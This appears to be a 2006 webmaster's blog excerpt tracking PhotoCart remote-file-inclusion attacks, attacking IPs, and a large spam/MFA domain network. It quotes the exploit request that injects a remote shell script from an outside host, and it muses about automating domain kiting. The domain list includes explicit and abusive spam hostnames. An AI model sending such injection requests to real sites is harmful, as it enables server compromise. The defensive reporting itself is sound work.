209.85.54.138 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.139 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.140 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.143 pages 1- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.146 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Now we just sit back and wait and watch to see where this info pops up as it could always be just a data mining operation which never shows up in the index.

Thursday, December 14, 2006

Next Wave PhotoCart Attack With New Domain

These assholes just don't stop trying this PhotoCart vulnerability, it's quite idiotic since it didn't work the last few thousand times they hit my site.

They have a new domain:

http://www.wnydir.com/c.in
Which currently proclaims:
Bandwidth Limit Exceeded The server is temporarily unable to service your request due to the site owner reaching his/her bandwidth limit. Please try again later.
Keep an eye on it, probably will be back up later or tomorrow, who knows.

These botnet guys obviously aren't the smartest tacks on the cork board picking a domain with throttled bandwidth to work from, but it's probably a hacked site and now that poor customer has no clue he's offline due to vandalism.

Here's the list of attackers so far today:
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 86 pages as "libwww-perl/5.805"
70.86.151.130 [82.97.5646.static.theplanet.com.] requested 45 pages as "libwww-perl/5.65"
66.254.98.142 [angels.reflected.net.] requested 39 pages as "libwww-perl/5.803"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 42 pages as "libwww-perl/5.801"
67.19.65.132 [84.41.1343.static.theplanet.com.] requested 41 pages as "libwww-perl/5.805"
64.8.114.12 [64-8-114-12.yourhostingprovider.net.] requested 43 pages as "libwww-perl/5.801"
69.56.180.222 [de.b4.3845.static.theplanet.com.] requested 27 pages as "libwww-perl/5.805"
85.214.19.18 [copyworld-kiel.de.] requested 53 pages as "libwww-perl/5.69"
195.242.211.253 [faq.ecobike.de.] requested 17 pages as "libwww-perl/5.48"
67.159.26.99 [.] requested 2 pages as "libwww-perl/5.805"
140.117.73.1 [finance.nsysu.edu.tw.] requested 41 pages as "libwww-perl/5.805"
203.194.134.166 [unknown] requested 37 pages as "libwww-perl/5.65"
66.103.152.111 [server22.internet-hosting-services.com.] requested 50 pages as "libwww-perl/5.805"
81.181.89.42 [cipnet.is.ew.ro.] requested 38 pages as "libwww-perl/5.805"
64.8.114.14 [web-06.ihservers.com.] requested 65 pages as "libwww-perl/5.801"
62.4.70.180 [62.4.70.180.fantasyvirtual.com.] requested 42 pages as "libwww-perl/5.803"
203.146.140.221 [besthost5.com.] requested 29 pages as "libwww-perl/5.64"
207.158.61.3 [ns1.control8.com.] requested 45 pages as "libwww-perl/5.79"
81.169.186.195 [moncserver.de.] requested 52 pages as "libwww-perl/5.803"
203.167.88.76 [unknown] requested 29 pages as "libwww-perl/5.65"
62.221.213.68 [unknown] requested 14 pages as "libwww-perl/5.65"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 28 pages as "libwww-perl/5.801"
189.146.75.42 [dsl-189-146-75-42.prod-infinitum.com.mx.] requested 19 pages as "libwww-perl/5.803"
81.183.219.157 [dsl51B7DB9D.fixip.t-online.hu.] requested 14 pages as "libwww-perl/5.803"
I wonder what compromised site they'll be using tomorrow?

Spam Kiting?

Someone I know just wrote an article about domain kiting and how he used to get domains for 5 days for free as long as you canceled them within 5 days. This triggered a memory as I remember writing about some spammers that were trying to bombard me with links to domains that didn't even exist yet, not registered to be exact. Then the domains became active suddenly to reap the rewards ot the previous blog spamming and most of them tended to vanish within a few days.

With all of this information inside my head it collided and bubba had a thought...

SPAM KITING!

Makes perfect sense too since many spammer domains get whacked in a couple of days as people complain to the web host.

So why not just use a domain for 5 days for free and cancel it?

You get rewarded for spamming for a bunch of domains you got completely for FREE and you don't get stuck holding the bag with a bunch of useless blacklisted domains most likely in a Google penalty box at that point.

Now a truly evil genius [looks in mirror] would write a script that checks to see if the domains in the attempted spams are registered and register them if they don't exist, then cancel them all 5 days later automatically. That way, the site being abused by the spam could take advantage of the spammers efforts and there is no connection between the spammer and the domain name except the existence of the spam linking to the domain.

I need to check my logs and see if the idiots that used to spam me with unregistered domains are still hard at work as I see some fun to be had!

Another Made For AdSense Scraper Linked to Umax Link Spammer

Another one of the Made For AdSense sites got caught in my snare and sure enough this one also was tied to a huge list of MFA sites and some porn spam sites as well.

Check this out:

http://www.digitbytes.com/
Did a little more research on the source of this scraping:
IP Address: 66.199.247.42
User Agent: lwp-trivial/1.41
It sounded familiar and sure enough it's the same IP address from a previous scraper I wrote about from umax-ppc.net (66.199.247.42) that previously had some virus injection stuff on their server, but I didn't check this time so beware.

Same IP as before, same user agent, still operating from the same location where they were previously hosting sites that injected a virus. It's simply amazing that this stuff is allowed to continue to operate within US data centers, or any data centers for that matter, as it's obvious the hosting companies are more concerned about their bottom line than their reputations or these guys wouldn't have a host.

I used this cool tool to get a list of all the link spam domains currently hosted on that server and it's a staggering list.
Found 730 websites with the IP 66.199.247.42

1) 1.top-10-shop.com
2) 1.yula.name
3) 100-inch.lcd.tv.1day.us
4) 12yo.umax-search.info
5) 1day.us
6) 2005.freeyaho.com
7) 2006.adsname.com
8) 2006.baikal-info.com
9) 2006.dimattic.com
10) 2006.freeyaho.com
11) 2006.hotel-baikal.info
12) 2006.online-info.info
13) 2006.you.freeyaho.com
14) 3.top-10-shop.com
15) 66.199.247.42
16) 8.freeyaho.com
17) a.adsname.com
18) a.freeyaho.com
19) abc-news.free-hit.com
20) academy-award-nominees.ppc-se.net
21) academy-awards.adsname.com
22) acoustic-guitar.1day.us
23) adawere.seblog.name
24) administration.specific911.biz
25) adoption.seblog.name
26) adsname.com
27) adult-gaming.umaxsearch-se.com
28) adultcheck.seblog.name
29) affiliate-books.com
30) air-compressor.seblog.name
31) alberta.ppc-se.com
32) alfred.top-10-shop.com
33) almond-trees.specific911.biz
34) american-immigration.keywords-blog.com
35) analysis.umax-search.info
36) and.1day.name
37) and.dimattic.com
38) and.freeyaho.com
39) and.online-info.info
40) and.rates.the.2006.1day.name
41) and.sampleclip.net
42) and.suggestions.and.real.the.2006.1day.name
43) and.umaxppc.com
44) and.umaxppcsearch.com
45) and.umaxse.net
46) and.webmasterdiscuss.com
47) angels.seblog.name
48) animals.seblog.name
49) anniversary-presents.seblog.name
50) anti-war.online-info.info
51) antiques.seblog.name
52) appraisal.ppc-se.net
53) architecture-record.seblog.name
54) army-tshirts.seblog.name
55) aroma.seblog.name
56) arshan.info
57) art-software.seblog.name
58) art-xxx.com
59) as-seen-on-tv.seblog.name
60) at.the.porn-teen-pic.com
61) auction.seblog.name
62) aussenputz.hockey.seblog.us
63) automotive-information-center.seblog.name
64) babe.seblog.name
65) baby-stroller.top-new-affiliate-programs.com
66) back-pack.seblog.name
67) baikal-hotel.com
68) baikal-info.com
69) baikal-shop.com
70) baikalguide.com
71) baikalsk.com
72) baikalsk.info
73) baikalsk.net
74) bankrupcy.seblog.name
75) baseball-betting-line.seblog.name
76) beach-cruisers.seblog.name
77) beach.top-10-shop.com
78) beaches.weekly-teens.com
79) bermuda-travel.seblog.name
80) best.freeyaho.com
81) best.ppc-se.net
82) best.top-10-shop.com
83) bet-and-win.seblog.name
84) beta-news.board-online.com
85) bicycle-catalog.seblog.name
86) bicycle-classified.seblog.name
87) bicycle-rating.seblog.name
88) bicycle-ratings.seblog.name
89) bicycle-safety.seblog.name
90) bicycle-sizing.seblog.name
91) bifocal-lens.seblog.name
92) bike-helmets.seblog.name
93) bike-sales.seblog.name
94) bikes-cruisers.seblog.name
95) bikini.seblog.name
96) bioresearch.online-info.info
97) blank-cdr-media.seblog.name
98) blog.freeyaho.com
99) blog.hotel-baikal.info
100) blog.porno-sample.com
101) blog.se.ppc-se.com
102) blog.umax-ppc.net
103) blog.umaxppc.net
104) blog.webmasterdiscuss.com
105) blue-dragon.board-online.com
106) blues.seblog.name
107) bmx-bicycle.seblog.name
108) board-online.com
109) boards-ppc-se.adsname.com
110) body-lotion.ads-affiliate-programs.com
111) boehm.seblog.name
112) booky.umaxppc.net
113) borrowing-money.seblog.name
114) british-columbia.ppc-se.com
115) bush-watch.seblog.name
116) business-administration-college.seblog.name
117) business-card-organizer.seblog.name
118) business.top-10-shop.com
119) but.freeyaho.com
120) but.seohuntress.com
121) buy-car.seblog.name
122) buy-diazepam.seblog.name
123) buy.freeyaho.com
124) buying-a-camera.seblog.name
125) cad-drafting.umaxsearch-se.com
126) calculator.seblog.name
127) canada-food-guide.seblog.name
128) canada.seblog.name
129) candy-stores.seblog.name
130) cannon-digital-camcorders.seblog.name
131) canon-g.seblog.name
132) cape-canaveral.board-online.com
133) car-buying-advice.seblog.name
134) carpenters.seblog.name
135) cash-advance-top.com
136) casio-watchband.seblog.name
137) casting.seblog.name
138) casual-clothes.top-new-affiliate-programs.com
139) casual.gamers.online-info.info
140) catalog.adsname.com
141) cd-interest-rate.seblog.name
142) cd-music.seblog.name
143) cd-replication.seblog.name
144) cello-lessons.internet-marketing-online.us
145) certificates.seblog.name
146) chapter.seblog.name
147) cheap-calls.seblog.name
148) cheap-computers.seblog.name
149) cheap.freeyaho.com
150) cheapest-gas.seblog.name
151) chemical-suppliers.seblog.name
152) chicago-bears-tickets.seblog.name
153) chicago.seblog.name
154) chicago.webmasterdiscuss.com
155) child.pornography.images.porno-sample.com
156) chimes.seblog.name
157) chocolate-fondue.seblog.name
158) christmas-crackers.seblog.name
159) christmas-decorations.seblog.name
160) chronometer.seblog.name
161) cinema.seblog.name
162) club.seblog.name
163) cme-courses.board-online.com
164) cobb-county-school.seblog.name
165) cocoa.dimattic.com
166) colloidal.seblog.name
167) columbia.seblog.name
168) commodity-charts.seblog.name
169) community.freeyaho.com
170) computer-cart.seblog.name
171) computers.seblog.name
172) conga.seblog.name
173) contractors.seblog.name
174) converting.seblog.name
175) cosmetic-contacts.webmaster-online.net
176) court-tv-message-boards.seblog.name
177) craft.seblog.name
178) credit-repair.seblog.name
179) critical.board-online.com
180) cruisers.seblog.name
181) csi.seblog.name
182) cufflinks.seblog.name
183) custom-mailbox.seblog.name
184) data-entry.seblog.name
185) data.seblog.name
186) day-camp.seblog.name
187) debt-to-income-ratio.seblog.name
188) decorative-bird-house.seblog.name
189) delaware.freeyaho.com
190) deltagard.top-10-shop.com
191) description.sehuntress.biz
192) desk.seblog.name
193) dessert.seblog.name
194) digital-world-insider.board-online.com
195) dildos.seblog.name
196) dimattic.com
197) dining-set.seblog.name
198) diploma.seblog.name
199) discount-cigarettes.umax-search.biz
200) discount-golf-clubs.seblog.name
201) discovers.computer-screen.ppc-se.info
202) disneyland-ticket.seblog.name
203) distributor-network.seblog.name
204) domain.freeyaho.com
205) domains-affiliate-programs.com
206) down-blouse-picture.seblog.us
207) drama.seblog.name
208) dremel-tool.seblog.name
209) drugs.seblog.name
210) dsdomain.com
211) dsl-available-area.webmaster-online.net
212) dsl-maryland.seblog.name
213) dvd-decoder.seblog.name
214) earth.systems.board-online.com
215) educators.top-10-shop.com
216) electronic-forms.seblog.name
217) electronic-passports.porno-sample.com
218) emergency.seblog.name
219) epson-pos-printer-ribbon.seblog.name
220) epson-products.seblog.name
221) esq-venture.seblog.name
222) eurail.seblog.name
223) eye-exercise.nude-teacher.com
224) faucets.seblog.name
225) ferret-cages.seblog.name
226) ferret.seblog.name
227) film-scanners.1day.us
228) fine-furniture.dsdomain.com
229) fioricet-online.seblog.name
230) firearms-law.seblog.name
231) first.freeyaho.com
232) fishing-industry.seblog.name
233) fitness-training.seblog.name
234) five.sehuntress.com
235) flags.umax-search-search-engine.com
236) flasks.seblog.name
237) flex.dimattic.com
238) flex.seblog.name
239) flexographic.seblog.name
240) florida-long-distance-providers.seblog.name
241) florist-uk.seblog.name
242) fluorescent-ballast.seblog.name
243) flute-lessons.seblog.name
244) foam.seblog.name
245) football.seblog.name
246) ford.seblog.name
247) form.adsname.com
248) form.freeyaho.com
249) form.news.umaxse.net
250) form.umaxppc.net
251) form.umaxse.net
252) form.umaxse.org
253) forum-online.biz
254) forum.adsname.com
255) france-flag.seblog.name
256) fraud.top-10-shop.com
257) free-hit.com
258) free-order.adsname.com
259) free.adsname.com
260) free.freeyaho.com
261) freebies.adsname.com
262) freebies.baikalsk.net
263) freebies.freeyaho.com
264) freebies.seohuntress.com
265) freebies.umaxppc.net
266) freestyle-bikes.seblog.name
267) freeyaho.com
268) french-chocolates.seblog.name
269) full-suspension-bike.seblog.name
270) futons.seblog.name
271) futures-broker.seblog.name
272) futures-charts.top-10-shop.com
273) g-string.seblog.name
274) gambling-rule.seblog.name
275) game-publisher.top-10-shop.com
276) gay-sex.baikalsk.com
277) general.yula.us
278) german-chocolate.seblog.name
279) glass-guard.seblog.name
280) global-positioning-system.ppc-se.com
281) google-ceo.board-online.com
282) google.adsense.ppc-se.com
283) google.top-10-shop.com
284) googlepray.adsname.com
285) gospel.hockey.seblog.us
286) graber.seblog.name
287) grip.seblog.name
288) guess.seblog.name
289) guestbook.adsname.com
290) guestbook.freeyaho.com
291) guestbook.umaxse.info
292) guestbook.umaxse.net
293) guylian.seblog.name
294) hair-style-photo.seblog.name
295) hairs.seblog.name
296) hardcore-fucking.seblog.name
297) health.top-10-shop.com
298) healthcare.seblog.name
299) healthy-appetizers.seblog.name
300) helmet-sale.dsdomain.com
301) helmet.seblog.name
302) herbal-breast-enhancement.seblog.name
303) hi-fi-audio.seblog.name
304) history-of-chocolate-cake.seblog.name
305) hockey-statistics.seblog.name
306) hockey.seblog.us
307) home-building-plans.seblog.name
308) home-decoration.seblog.name
309) home-repair-help.seblog.name
310) home.adsname.com
311) homedrugtest.seblog.name
312) horoscopes.seblog.name
313) hot-jobs-online.com
314) hotel-baikal.com
315) hotel-baikal.info
316) hotel-shop.info
317) hotel.freeyaho.com
318) house-plants.seblog.name
319) houseware.seblog.name
320) how-to-lose-weight.seblog.name
321) hp-ink.dimattic.com
322) hp.seblog.name
323) humidor.seblog.name
324) hybrids.seblog.name
325) i-love-lucy.dimattic.com
326) i-love-you-gifts.umax-search-search-engine.com
327) iguana-cages.seblog.name
328) imported-candy.umax-search.biz
329) impotent.seblog.name
330) inc.seblog.name
331) incorporate-in-new-jersey.seblog.name
332) independent-book-publishers.seblog.name
333) independent-contractor.seblog.name
334) individual-investor-magazine.seblog.name
335) industrial-adhesives.seblog.name
336) industrial-valves.seblog.name
337) info.seblog.name
338) information-broker.seblog.name
339) insect-repellants.porno-sample.com
340) intel.seblog.name
341) internet-marketing-online.us
342) internet-marketing.adsname.com
343) internet.baikal-info.com
344) internet.freeyaho.com
345) interracial.seblog.name
346) investing.seblog.name
347) islander-on-the-beach.seblog.name
348) jaguar-xj.seblog.name
349) jensen-headphones.seblog.name
350) job-opening.seblog.name
351) john-hopkins-medical-center.seblog.name
352) jumpsuits.seblog.name
353) jvc-camcorder-vhsc.seblog.name
354) keynote.seblog.name
355) keyword.qoclick.net
356) keywords-blog.com
357) keywords.freeyaho.com
358) kids-game.seblog.name
359) kilts.seblog.name
360) kiss.seblog.name
361) kodak.seblog.name
362) lake-baikal.info
363) lamp-and-shade.seblog.name
364) las-cruces-sun-news.seblog.name
365) last.top-10-shop.com
366) latest.freeyaho.com
367) latest.ppc-se.com
368) latina.seblog.name
369) learning-computer.umax-search-search-engine.com
370) lease.seblog.name
371) leather-brief-case.seblog.name
372) leather-briefcase.seblog.name
373) lesson.top-10-shop.com
374) lexmark--driver.seblog.name
375) lexmark.specific911.org
376) library-project.tricks.name
377) light-bulb.seblog.name
378) lighting-design.seblog.name
379) lightwave.seblog.name
380) literature.yula.us
381) lithography.seblog.name
382) litter.seblog.name
383) local-telephone-service.seblog.name
384) logo.top-10-shop.com
385) lonestar.seblog.name
386) loop.seblog.name
387) low-intrest-credit-card.seblog.name
388) lowermybills.com.webmasterdiscuss.com
389) macanudo.seblog.name
390) magic.seblog.name
391) magnet.seblog.name
392) major-vulnerability.porno-sample.com
393) managed-futures.seblog.name
394) map-guide.freeyaho.com
395) maps.seblog.name
396) marketing-organization.seblog.name
397) martial-arts-information.seblog.name
398) maryland-local-phone-service.seblog.name
399) may.umax-search.info
400) mechanical-tubing.seblog.name
401) medical-advise.seblog.name
402) medical-references.seblog.name
403) medical-sites.seblog.name
404) medical-symbols.seblog.name
405) men-bracelet.seblog.name
406) mens-dress-watches.seblog.name
407) meta-tags.blog.ppc-se.com
408) mexico-newspaper.seblog.name
409) miami-tv.sampleclip.net
410) milk-chocolate.seblog.name
411) mlb.seblog.name
412) mobile-computing.board-online.com
413) modern-chairs.seblog.name
414) moonstruck-chocolatier.seblog.name
415) most.adsname.com
416) most.freeyaho.com
417) most.woodworking.real.the.2006.1day.name
418) mothers.seblog.us
419) movado.seblog.name
420) msn-search.blog.ppc-se.com
421) multifunction-printers.seblog.name
422) nada-used-car-guide.seblog.name
423) natural-pest-control.seblog.name
424) natural-skin-care.seblog.name
425) ncaa-sports.seblog.name
426) network-traffic-analysis.seblog.name
427) new-car.seblog.name
428) news-analysis.board-online.com
429) news.blog-se.ppc-se.info
430) news.top-10-shop.com
431) news.umaxse.net
432) news.woods-hole-researcher.ppc-se.info
433) nfl-football-picks.seblog.name
434) nfl-stats.seblog.name
435) nhl-picks.seblog.name
436) nintendo.co.ltd.board-online.com
437) nintendo.latest-console.board-online.com
438) nokia-phones.baikal-shop.com
439) noni.seblog.name
440) nude-teacher.com
441) numerous.umax-search.info
442) nursing-home-malpractice.seblog.name
443) nut-tree.seblog.name
444) october.window.tricks.name
445) odds-makers.seblog.name
446) odds.seblog.name
447) off-track-betting.seblog.name
448) ohio-attorney.seblog.name
449) online-info.info
450) online-jewelry.seblog.name
451) online-jukebox.seblog.name
452) online-pharmacy.seblog.name
453) online.freeyaho.com
454) online.online-info.info
455) or.adsname.com
456) or.freeyaho.com
457) or.online-info.info
458) oscar.seblog.name
459) osteo-arthritis.seblog.name
460) out-google.blog.ppc-se.com
461) overthrow-apple-computer.ppc-se.com
462) pa.online-info.info
463) packages.freeyaho.com
464) pads.seblog.name
465) pallet-jack.seblog.name
466) pallet.seblog.name
467) panasonic-product.seblog.name
468) paper-weights.seblog.name
469) parenting.seblog.name
470) pc-game.baikalsk.net
471) pecan-praline.seblog.name
472) penile-erection.seblog.name
473) pentax-zxm.seblog.name
474) personal-finances.seblog.name
475) pet-monkey.seblog.name
476) pet-tags.seblog.name
477) photo-exhibition.seblog.name
478) photographic-paper.seblog.name
479) php.yula.ws
480) pink.seblog.name
481) pittsburgh-newspaper.seblog.name
482) placemat.seblog.name
483) plants.seblog.name
484) playing-cards.seblog.name
485) playstation-3.board-online.com
486) playstation-3.top-10-shop.com
487) plea-bargain.seblog.name
488) plus.sehuntress.com
489) polar-fleece-jackets.seblog.name
490) polaroid-camera.seblog.name
491) polo.seblog.name
492) pop.seblog.name
493) popcorn-machine.seblog.name
494) popular.dimattic.com
495) popular.freeyaho.com
496) porn-teen-pic.com
497) porno-sample.com
498) portable-scooter.seblog.name
499) powerball-lottery.seblog.name
500) ppc-se-provides.top-new-affiliate-programs.com
501) ppc-se.biz
502) ppc-se.com
503) ppc-se.net
504) ppc-se.top.and.reef.adscom.us
505) ppc.adsname.com
506) ppc.freeyaho.com
507) premium-content.top-10-shop.com
508) prescription.seblog.name
509) price.baikal-shop.com
510) print-on-demand.seblog.name
511) print.seblog.name
512) printing-methods.seblog.name
513) producing.porno-sample.com
514) program-directory.adsname.com
515) publications.seblog.name
516) publishing-mergers.seblog.name
517) qoclick-se.adsname.com
518) qoclick.net
519) questions.freeyaho.com
520) questions.specific911.info
521) questions.umax.org
522) questions.umaxppc.net
523) questions.we.freeyaho.com
524) questions.yula.us
525) quick-money.seblog.name
526) rack-case.seblog.name
527) rack.seblog.name
528) radio-blog-club.seblog.name
529) radio-station.seblog.name
530) raliegh-bicycles.seblog.name
531) ralph-lauren-eyewear.seblog.name
532) rates.the.2006.1day.name
533) ray-ban.seblog.name
534) reber.seblog.name
535) register.freeyaho.com
536) replacement-china.seblog.name
537) reseller-porn.com
538) robert.m.carey.porno-sample.com
539) roller-conveyors.seblog.name
540) rose.work-at-home-online.info
541) saab-part.seblog.name
542) safety-glasses.seblog.name
543) same.freeyaho.com
544) sampleclip.net
545) samsung-camcorder.seblog.name
546) samsung.seblog.name
547) santana.seblog.name
548) sapphire-earrings.seblog.name
549) scale.seblog.name
550) scanner.seblog.name
551) school.seblog.name
552) school.top-10-shop.com
553) sconce.seblog.name
554) script.php.baikal-guide.com
555) se-blog.ppc-se.com
556) se.blog.ppc-se.com
557) seblog.name
558) security-vulnerability.specific911.info
559) sehuntress.com
560) sehuntress.info
561) sehuntress.net
562) self-help-videos.seblog.name
563) seohuntress.com
564) sfi.seblog.name
565) shipping-information.seblog.name
566) shopping-services.seblog.name
567) shopping.baikal-shop.com
568) showavailable.com
569) side.specific911.info
570) siemens.seblog.name
571) simple-gifts.seblog.name
572) single-latin-woman.seblog.name
573) site-diagnostics.adsname.com
574) site.adsname.com
575) slager-radio.seblog.name
576) smith.seblog.name
577) so.adsname.com
578) soccer.seblog.name
579) software-giant.blog.ppc-se.com
580) software-products.board-online.com
581) solar-observatories.board-online.com
582) solar.terrestrial.relations.observatory.board-online.com
583) sony-digital-tv.seblog.name
584) sony-dvd-players.sampleclip.net
585) sony-mavica.seblog.name
586) soul.seblog.name
587) spa.seblog.name
588) spacecraft.board-online.com
589) specialty-envelopes.seblog.name
590) specialty-printers.seblog.name
591) specific.adsname.com
592) specific.dimattic.com
593) specific.freeyaho.com
594) specific.reseller-porn.com
595) specific.sampleclip.net
596) specific.top-10-shop.com
597) specific911.biz
598) specific911.info
599) specific911.org
600) specific911.umax-search.info
601) speed-up-internet.seblog.name
602) spells.seblog.name
603) spoon.seblog.name
604) spreadsheet-help.seblog.name
605) standard-bikes.seblog.name
606) star-printer.seblog.name
607) stemware.seblog.name
608) stickers.seblog.name
609) suggestions.adsname.com
610) suggestions.umax-search.info
611) suggestions.umax.org
612) suggestions.umaxse.org
613) suit.seblog.name
614) sunburn.seblog.name
615) sunglases.seblog.name
616) sweepstakes.seblog.name
617) tables.seblog.name
618) tanning-products.seblog.name
619) tax-filing.umax-se.biz
620) tax-rates.seblog.name
621) technologies.seblog.name
622) teen-sex.seblog.name
623) teens.seblog.name
624) telecommunication.seblog.name
625) tennessee.seblog.name
626) tent.top-10-shop.com
627) the-bad.blog.ppc-se.com
628) the-bottom.blog.ppc-se.com
629) the-good.blog.ppc-se.com
630) the.adsname.com
631) the.freeyaho.com
632) the.hotel-baikal.info
633) the.lake-baikal.info
634) the.online-info.info
635) the.porn-teen-pic.com
636) thesaurus.yula.us
637) tips.sehuntress.com
638) titanic.seblog.name
639) titanium.seblog.name
640) tokyo-game-show-2006.board-online.com
641) tommy-hilfiger.seblog.name
642) top-10-shop.com
643) toshiba-copiers.seblog.name
644) tour.seblog.name
645) towel.seblog.name
646) tracking.seblog.name
647) trade-show-display.seblog.name
648) traffic-information.seblog.name
649) training.seblog.name
650) transformers.seblog.name
651) travel-gear.sehuntress.net
652) truffles.seblog.name
653) tube.seblog.name
654) tv-videos.ppc-se.info
655) ultima.seblog.name
656) ultra-mobile.board-online.com
657) umax-ppc.net
658) umax-se.biz
659) umax-se.org
660) umax-search-ppc-se-board.com
661) umax-search-ppc.com
662) umax-search-search-engine.com
663) umax-search.biz
664) umax-search.info
665) umax.org
666) umaxppc.com
667) umaxppc.net
668) umaxppcsearch.com
669) umaxse.biz
670) umaxse.info
671) umaxse.net
672) umaxse.org
673) umaxsearch-ppc-se.com
674) umaxsearch-ppc.com
675) umaxsearch-se.com
676) unique-gift-ideas.seblog.name
677) university.freeyaho.com
678) unusual-clocks.seblog.name
679) usa.freeyaho.com
680) utilities.seblog.name
681) va.top-10-shop.com
682) valium-buy.1day.name
683) vermont-college.seblog.name
684) victorian.seblog.name
685) vintage-eyewear.seblog.name
686) virgin-sexy.com
687) virtual.freeyaho.com
688) virtual.ppc-se.net
689) virtual.seohuntress.com
690) virtual.specific911.info
691) virtual.umax.org
692) we.freeyaho.com
693) weather.sehuntress.com
694) web-design.seblog.name
695) web-statistic.seblog.name
696) web.gambling-laws.affiliate-books.com
697) webmasterdiscuss.com
698) weekly-pay-ppc-se.com
699) weekly-teens.com
700) western-new-england-college.seblog.name
701) white-boards.seblog.name
702) widely.gambling-laws.affiliate-books.com
703) windchimes.seblog.name
704) window.tricks.name
705) wine-of-the-month.seblog.name
706) winery.seblog.name
707) witch.seblog.name
708) wood-blinds.webmasterdiscuss.com
709) wooden-clocks.seblog.name
710) wooden-shelves.seblog.name
711) work-at-home-top.com
712) work-from-home-message-boards.seblog.name
713) work.top-10-shop.com
714) workforce-management.seblog.name
715) workstation.seblog.name
716) world.adsname.com
717) world.freeyaho.com
718) writing-marketing-plan.seblog.name
719) xbox-360.board-online.com
720) xerox-printer-cartridges.seblog.name
721) yahoo-message-boards.seblog.name
722) you.freeyaho.com
723) you.gambling-laws.affiliate-books.com
724) you.valium-buy.1day.name
725) your.freeyaho.com
726) your.umax-search.info
727) yula.name
728) yula.us
729) yula.ws
730) zune.board-online.com
Just pick a random domain name out of the list and see how much spam you can find in the search engines all related to this single domain. This group does it all from guestbook spam to membership profile spam, it's a one stop spam shop.

Note that the purpose of most of these domains is to redirect you to a free parked page on FREEYAHO which appears to be where they make their money.

What a twisted web of MFA, spam and domain parks they've woven.

Wednesday, December 13, 2006

Escalating PhotoCart Vulnerability Attack

I thought this silly little phase had passed and these morons had given up since there were only a few attempts after my last post. Sadly, that wasn't the case and when I got up this morning and checked the site stats I found they mounted an even bigger attack than before.

This is all good, just keep coming at my site and exposing the size of your network, because you're just proving Forest Gump's mother correct as "Stupid is as stupid does."

Here's the path they desperately want, which doesn't exist on my server:

GET /PhotoCart/adminprint.php?path=http://panoplanet.com/c.in?

[UPDATE: It appears panoplanet.com has been taken down within the last couple of hours so you can't see the script anymore. Here are some links to show they were attacking others for a variety of things.]

Note that this is the script they are attempting to inject, which appears to give them shell access from a casual glance of the code.


Here's all the sites involved in today's attack:

70.86.151.130 [82.97.5646.static.theplanet.com.] requested 49 pages as "libwww-perl/5.65"
72.29.74.43 [deso.surpasshosting.com.] requested 53 pages as "libwww-perl/5.805"
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 84 pages as "libwww-perl/5.805"
72.22.69.189 [host503.ipowerweb.com.] requested 63 pages as "libwww-perl/5.76"
72.29.83.98 [jet33.hasweb.com.] requested 54 pages as "libwww-perl/5.805"
216.227.220.4 [xena.lunarpages.com.] requested 92 pages as "libwww-perl/5.805"
66.235.221.231 [host131.ipowerweb.com.] requested 107 pages as "libwww-perl/5.805"
204.157.36.20 [unknown20.36.157.204.defenderhosting.com.] requested 56 pages as "libwww-perl/5.805"
72.5.54.51 [web13.lx.host.inap.sea.dotster.net.] requested 75 pages as "libwww-perl/5.65"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 75 pages as "libwww-perl/5.801"
189.146.75.42 [dsl-189-146-75-42.prod-infinitum.com.mx.] requested 32 pages as "libwww-perl/5.803"
66.254.98.142 [angels.reflected.net.] requested 62 pages as "libwww-perl/5.803"
69.56.180.222 [de.b4.3845.static.theplanet.com.] requested 64 pages as "libwww-perl/5.805"
205.234.100.65 [unknown65.100.234.205.defenderhosting.com.] requested 64 pages as "libwww-perl/5.805"
83.138.166.13 [s79719.lovehorse.co.uk.] requested 41 pages as "libwww-perl/5.79"
66.103.152.111 [server22.internet-hosting-services.com.] requested 55 pages as "libwww-perl/5.805"
72.249.16.108 [actstwo.com.] requested 32 pages as "libwww-perl/5.805"
67.19.65.132 [84.41.1343.static.theplanet.com.] requested 72 pages as "libwww-perl/5.805"
66.235.206.151 [host223.ipowerweb.com.] requested 66 pages as "libwww-perl/5.805"
69.10.142.59 [unknown.rackforce.com.] requested 108 pages as "libwww-perl/5.805"
64.8.114.14 [web-06.ihservers.com.] requested 83 pages as "libwww-perl/5.801"
67.159.26.99 [.] requested 60 pages as "libwww-perl/5.805"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 70 pages as "libwww-perl/5.801"
203.194.134.166 [unknown] requested 22 pages as "libwww-perl/5.65"
81.169.186.195 [unknown] requested 33 pages as "libwww-perl/5.803"
65.38.168.212 [2yellow.veraserve.com.] requested 72 pages as "libwww-perl/5.805"
69.93.107.114 [72.6b.5d45.static.theplanet.com.] requested 5 pages as "libwww-perl/5.805"
194.152.183.230 [unknown] requested 19 pages as "libwww-perl/5.805"
64.8.114.12 [64-8-114-12.yourhostingprovider.net.] requested 67 pages as "libwww-perl/5.801"
207.158.61.3 [ns1.control8.com.] requested 77 pages as "libwww-perl/5.79"
85.214.19.18 [copyworld-kiel.de.] requested 25 pages as "libwww-perl/5.69"
62.4.70.180 [62.4.70.180.fantasyvirtual.com.] requested 35 pages as "libwww-perl/5.803"
203.146.140.221 [unknown] requested 12 pages as "libwww-perl/5.64"
89.108.80.229 [server2.vlr.ru.] requested 40 pages as "libwww-perl/5.805"
207.99.63.90 [www.myonlinephotos.net.] requested 31 pages as "libwww-perl/5.79"
203.167.111.133 [133.111.167.203.assigned.static.eastern-tele.com.] requested 11 pages as "libwww-perl/5.79"
81.183.219.157 [dsl51B7DB9D.fixip.t-online.hu.] requested 12 pages as "libwww-perl/5.803"
62.221.213.68 [unknown] requested 9 pages as "libwww-perl/5.65"
88.149.156.142 [www.futurweb.info.] requested 24 pages as "libwww-perl/5.803"
220.134.22.185 [main.ethantw.tw.] requested 17 pages as "libwww-perl/5.805"
140.117.73.1 [finance.nsysu.edu.tw.] requested 9 pages as "libwww-perl/5.805"
81.181.89.42 [cipnet.is.ew.ro.] requested 30 pages as "libwww-perl/5.805"
203.167.88.76 [unknown] requested 14 pages as "libwww-perl/5.65"
